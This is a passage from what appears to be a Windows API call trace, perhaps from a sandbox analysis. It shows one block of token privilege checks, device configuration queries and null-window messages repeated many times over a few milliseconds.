pfResult=0x18fe54) returned 1 [0016.942] SetLastError (dwErrCode=0x522) [0016.942] CloseHandle (hObject=0x114) returned 1 [0016.942] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.942] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.942] GetLastError () returned 0x578 [0016.942] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.942] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.942] GetCurrentThread () returned 0xfffffffe [0016.942] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.942] GetLastError () returned 0x3f0 [0016.942] GetCurrentProcess () returned 0xffffffff [0016.942] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.942] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.942] SetLastError (dwErrCode=0x522) [0016.942] CloseHandle (hObject=0x114) returned 1 [0016.942] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.942] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.942] GetLastError () returned 0x578 [0016.942] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.942] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.942] GetCurrentThread () returned 0xfffffffe [0016.942] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.942] GetLastError () returned 0x3f0 [0016.942] GetCurrentProcess () returned 0xffffffff [0016.942] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.942] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.942] SetLastError (dwErrCode=0x522) [0016.942] CloseHandle (hObject=0x114) returned 1 [0016.942] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.942] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.942] GetLastError () returned 0x578 [0016.942] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.942] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.942] GetCurrentThread () returned 0xfffffffe [0016.942] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.942] GetLastError () returned 0x3f0 [0016.942] GetCurrentProcess () returned 0xffffffff [0016.942] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.942] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.942] SetLastError (dwErrCode=0x522) [0016.942] CloseHandle (hObject=0x114) returned 1 [0016.942] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.942] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.943] GetLastError () returned 0x578 [0016.943] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.943] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.943] GetCurrentThread () returned 0xfffffffe [0016.943] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.943] GetLastError () returned 0x3f0 [0016.943] GetCurrentProcess () returned 0xffffffff [0016.943] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.943] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.943] SetLastError (dwErrCode=0x522) [0016.943] CloseHandle (hObject=0x114) returned 1 [0016.943] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.943] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.943] GetLastError () returned 0x578 [0016.943] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.943] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.943] GetCurrentThread () returned 0xfffffffe [0016.943] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.943] GetLastError () returned 0x3f0 [0016.943] GetCurrentProcess () returned 0xffffffff [0016.943] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.943] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.943] SetLastError (dwErrCode=0x522) [0016.943] CloseHandle (hObject=0x114) returned 1 [0016.943] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.943] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.943] GetLastError () returned 0x578 [0016.943] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.943] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.943] GetCurrentThread () returned 0xfffffffe [0016.943] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.943] GetLastError () returned 0x3f0 [0016.943] GetCurrentProcess () returned 0xffffffff [0016.943] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.943] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.943] SetLastError (dwErrCode=0x522) [0016.943] CloseHandle (hObject=0x114) returned 1 [0016.943] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.943] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.943] GetLastError () returned 0x578 [0016.943] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.943] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.943] GetCurrentThread () returned 0xfffffffe [0016.944] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.944] GetLastError () returned 0x3f0 [0016.944] GetCurrentProcess () returned 0xffffffff [0016.944] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.944] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.944] SetLastError (dwErrCode=0x522) [0016.944] CloseHandle (hObject=0x114) returned 1 [0016.944] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.944] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.944] GetLastError () returned 0x578 [0016.944] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.944] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.944] GetCurrentThread () returned 0xfffffffe [0016.944] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.944] GetLastError () returned 0x3f0 [0016.944] GetCurrentProcess () returned 0xffffffff [0016.944] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.944] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.944] SetLastError (dwErrCode=0x522) [0016.944] CloseHandle (hObject=0x114) returned 1 [0016.944] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.944] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.944] GetLastError () returned 0x578 [0016.944] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.944] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.944] GetCurrentThread () returned 0xfffffffe [0016.944] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.944] GetLastError () returned 0x3f0 [0016.944] GetCurrentProcess () returned 0xffffffff [0016.944] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.944] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.944] SetLastError (dwErrCode=0x522) [0016.944] CloseHandle (hObject=0x114) returned 1 [0016.944] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.944] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.944] GetLastError () returned 0x578 [0016.944] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.944] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.944] GetCurrentThread () returned 0xfffffffe [0016.944] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.944] GetLastError () returned 0x3f0 [0016.944] GetCurrentProcess () returned 0xffffffff [0016.944] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.944] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.945] SetLastError (dwErrCode=0x522) [0016.945] CloseHandle (hObject=0x114) returned 1 [0016.945] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.945] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.945] GetLastError () returned 0x578 [0016.945] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.945] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.945] GetCurrentThread () returned 0xfffffffe [0016.945] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.945] GetLastError () returned 0x3f0 [0016.945] GetCurrentProcess () returned 0xffffffff [0016.945] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.945] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.945] SetLastError (dwErrCode=0x522) [0016.945] CloseHandle (hObject=0x114) returned 1 [0016.945] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.945] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.945] GetLastError () returned 0x578 [0016.945] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.945] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.945] GetCurrentThread () returned 0xfffffffe [0016.945] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.945] GetLastError () returned 0x3f0 [0016.945] GetCurrentProcess () returned 0xffffffff [0016.945] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.945] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.945] SetLastError (dwErrCode=0x522) [0016.945] CloseHandle (hObject=0x114) returned 1 [0016.945] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.945] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.945] GetLastError () returned 0x578 [0016.945] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.945] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.945] GetCurrentThread () returned 0xfffffffe [0016.945] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.945] GetLastError () returned 0x3f0 [0016.945] GetCurrentProcess () returned 0xffffffff [0016.945] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.945] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.945] SetLastError (dwErrCode=0x522) [0016.945] CloseHandle (hObject=0x114) returned 1 [0016.945] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.945] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.945] GetLastError () returned 0x578 [0016.946] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.946] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.946] GetCurrentThread () returned 0xfffffffe [0016.946] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.946] GetLastError () returned 0x3f0 [0016.946] GetCurrentProcess () returned 0xffffffff [0016.946] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.946] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.946] SetLastError (dwErrCode=0x522) [0016.946] CloseHandle (hObject=0x114) returned 1 [0016.946] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.946] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.946] GetLastError () returned 0x578 [0016.946] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.946] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.946] GetCurrentThread () returned 0xfffffffe [0016.946] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.946] GetLastError () returned 0x3f0 [0016.946] GetCurrentProcess () returned 0xffffffff [0016.946] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.946] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.946] SetLastError (dwErrCode=0x522) [0016.946] CloseHandle (hObject=0x114) returned 1 [0016.946] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.946] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.946] GetLastError () returned 0x578 [0016.946] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.946] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.946] GetCurrentThread () returned 0xfffffffe [0016.946] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.946] GetLastError () returned 0x3f0 [0016.946] GetCurrentProcess () returned 0xffffffff [0016.946] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.946] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.946] SetLastError (dwErrCode=0x522) [0016.946] CloseHandle (hObject=0x114) returned 1 [0016.946] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.946] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.946] GetLastError () returned 0x578 [0016.946] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.946] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.946] GetCurrentThread () returned 0xfffffffe [0016.946] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.947] GetLastError () returned 0x3f0 [0016.947] GetCurrentProcess () returned 0xffffffff [0016.947] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.947] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.947] SetLastError (dwErrCode=0x522) [0016.947] CloseHandle (hObject=0x114) returned 1 [0016.947] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.947] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.947] GetLastError () returned 0x578 [0016.947] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.947] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.947] GetCurrentThread () returned 0xfffffffe [0016.947] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.947] GetLastError () returned 0x3f0 [0016.947] GetCurrentProcess () returned 0xffffffff [0016.947] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.947] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.947] SetLastError (dwErrCode=0x522) [0016.947] CloseHandle (hObject=0x114) returned 1 [0016.947] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.947] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.947] GetLastError () returned 0x578 [0016.947] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.947] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.947] GetCurrentThread () returned 0xfffffffe [0016.947] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.947] GetLastError () returned 0x3f0 [0016.947] GetCurrentProcess () returned 0xffffffff [0016.947] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.947] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.947] SetLastError (dwErrCode=0x522) [0016.947] CloseHandle (hObject=0x114) returned 1 [0016.947] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.947] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.947] GetLastError () returned 0x578 [0016.947] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.947] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.947] GetCurrentThread () returned 0xfffffffe [0016.947] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.947] GetLastError () returned 0x3f0 [0016.947] GetCurrentProcess () returned 0xffffffff [0016.947] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.948] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.948] SetLastError (dwErrCode=0x522) [0016.948] CloseHandle (hObject=0x114) returned 1 [0016.948] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.948] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.948] GetLastError () returned 0x578 [0016.948] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.948] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.948] GetCurrentThread () returned 0xfffffffe [0016.948] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.948] GetLastError () returned 0x3f0 [0016.948] GetCurrentProcess () returned 0xffffffff [0016.948] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.948] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.948] SetLastError (dwErrCode=0x522) [0016.948] CloseHandle (hObject=0x114) returned 1 [0016.948] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.948] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.948] GetLastError () returned 0x578 [0016.948] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.948] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.948] GetCurrentThread () returned 0xfffffffe [0016.948] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.948] GetLastError () returned 0x3f0 [0016.948] GetCurrentProcess () returned 0xffffffff [0016.948] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.948] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, 